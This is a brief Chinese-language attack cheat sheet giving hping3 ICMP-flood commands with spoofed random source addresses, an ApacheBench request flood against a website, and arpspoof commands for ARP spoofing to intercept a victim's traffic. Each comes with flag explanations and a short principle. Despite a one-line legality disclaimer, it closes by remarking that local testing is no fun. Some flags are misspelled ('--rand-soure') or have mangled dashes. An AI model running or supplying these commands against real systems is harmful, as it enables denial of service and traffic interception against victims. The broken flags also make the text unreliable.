1.icmp flood攻击
命令:hping3 --icmp --rand-soure --flood -d 1400 攻击目标ip
–icmp————攻击方式
–rand-soure————发起攻击的ip地址随机
-d:报文的大小(注:一般的ping报最大是1500字节,推荐1400字节)
如:hping3 –icmp –rand-soure –flood -d 1200 192.168.101.12
(原理:发送大量的ping包,让其服务器瘫痪)
2.CC攻击(web 压力测试)
命令:ab -n 100000 -c 10000 www.xxxx.com
(原理:模拟用户来多线程请求但较为耗CPU内存的URL)
3.ARP欺骗攻击
命令:arpspoof -i eth0 -t 攻击目标iP kali网关ip
-i ———网卡
-t——— 目标ip 网关
(原理:用户服务物联网需要通过路由器的网关,这个时候给受害者发送arp报文,伪装其上网的网关,受害者则认为kali攻击机的MAC地址是正常上网的Mac地址,则受害者给kali发送报文。kali可以在进行处理(拦截)
(注:未授权的网站渗透,都属于违法行为)
本地发包不好玩啊